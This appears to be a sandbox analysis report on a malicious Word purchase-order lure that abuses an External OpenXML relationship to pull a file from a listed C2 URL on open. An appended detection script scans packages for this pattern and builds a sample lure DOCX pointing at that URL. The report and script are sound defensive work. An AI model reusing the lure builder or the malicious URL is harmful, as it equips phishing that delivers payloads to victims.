General

  • Target

    PO-EME3448.docx

  • Size

    10KB

  • Sample

    210601-ssfzwsakjs

  • MD5

    41cb54585c5188446052b8af876825db

  • SHA1

    3f4747f38265aa7ebae7440e78e73e10742bc727

  • SHA256

    474b17e5fdf5312c53ea7c31b6b5a7aebe51b6a6031f166c600527ec54e194ae

  • SHA512

    410b07896f4d1ef045ec2cf4c3e26f34b5e7bb91f6d6552788d9993c3ba88fcbec4d954ef6637695e9f16dbe0eca2242f4e30f98405a3a18f27f04283a359af6

Score
10/10

Malware Config

Extracted

Rule    Microsoft Office WebSettings Relationship
C2      http://79.110.52.186/naki/n.wbk

Targets

    • Target

      PO-EME3448.docx

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Abuses OpenXML format to download file from external location

      A relationship in one of the document's .rels parts points to a target with TargetMode="External" instead of a part inside the package, so Word fetches the remote file (here http://79.110.52.186/naki/n.wbk, listed under Malware Config) when the document is opened. The file is a .docx, which cannot carry macro code, so the download does not depend on macros.
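As an added example (not part of this report and not the sandbox's own rule), the script below inspects a DOCX package for the structure the "Microsoft Office WebSettings Relationship" rule describes: a Relationship element with TargetMode="External" inside a .rels part. The package it scans is constructed in the script itself; only the URL is taken from the report. The set of auto-loaded relationship types, and the use of the "frame" relationship type for the webSettings frameset, are assumptions drawn from the OpenXML relationship schema rather than facts stated in the report.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Assumption: relationship types that Word resolves on its own when the document
# is opened. An External target of one of these types is a download-on-open indicator.
AUTO_LOAD_TYPES = {
    R_NS + "/frame",             # webSettings.xml frameset (the pattern this report flags)
    R_NS + "/attachedTemplate",  # settings.xml remote template
    R_NS + "/oleObject",         # linked OLE object in document.xml
}


def find_external_relationships(docx_bytes):
    """Scan every *.rels part in the package and return one tuple
    (rels_part, relationship_type, target, auto_load) per External relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                # TargetMode is optional and defaults to Internal.
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                rtype = rel.get("Type", "")
                hits.append((name, rtype, rel.get("Target", ""), rtype in AUTO_LOAD_TYPES))
    return hits


def build_sample_docx(remote_url=None):
    """Constructed minimal DOCX (not the analysed sample). With remote_url set,
    word/_rels/webSettings.xml.rels carries an External 'frame' relationship to it;
    without it, the package is clean."""
    xml_head = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    parts = {
        "[Content_Types].xml": xml_head +
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/>'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
            '<Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/>'
            '</Types>',
        "_rels/.rels": xml_head +
            '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%s/officeDocument" '
            'Target="word/document.xml"/></Relationships>' % (REL_NS, R_NS),
        "word/document.xml": xml_head +
            '<w:document xmlns:w="%s"><w:body><w:p><w:r><w:t>Purchase order attached.</w:t>'
            '</w:r></w:p></w:body></w:document>' % W_NS,
        "word/_rels/document.xml.rels": xml_head +
            '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%s/webSettings" '
            'Target="webSettings.xml"/></Relationships>' % (REL_NS, R_NS),
        "word/webSettings.xml": xml_head +
            '<w:webSettings xmlns:w="%s" xmlns:r="%s"><w:frameset><w:frame>'
            '<w:sourceFileName r:id="rId1"/></w:frame></w:frameset></w:webSettings>' % (W_NS, R_NS),
    }
    if remote_url:
        # The External relationship: the frame's source lives outside the package.
        parts["word/_rels/webSettings.xml.rels"] = xml_head + (
            '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%s/frame" '
            'TargetMode="External" Target="%s"/></Relationships>' % (REL_NS, R_NS, remote_url))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()


if __name__ == "__main__":
    # The URL is the one extracted in the report; the package around it is constructed here.
    lure = build_sample_docx("http://79.110.52.186/naki/n.wbk")
    for part, rtype, target, auto in find_external_relationships(lure):
        kind = rtype.rsplit("/", 1)[-1]
        print("%s -> %s [%s]%s" % (part, target, kind, " (fetched on open)" if auto else ""))
    print("clean document hits:", find_external_relationships(build_sample_docx()))
```

Run against a real file with `find_external_relationships(open(path, "rb").read())`; any hit with auto_load set is worth treating as a download URL indicator, and the other External hits (hyperlinks, for instance) are the benign noise the rule has to tolerate.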

MITRE ATT&CK Matrix (ATT&CK v6)

Tactic            Technique                       ID      Count
Defense Evasion   Modify Registry                 T1112   1
Discovery         Query Registry                  T1012   2
Discovery         System Information Discovery    T1082   2

Tasks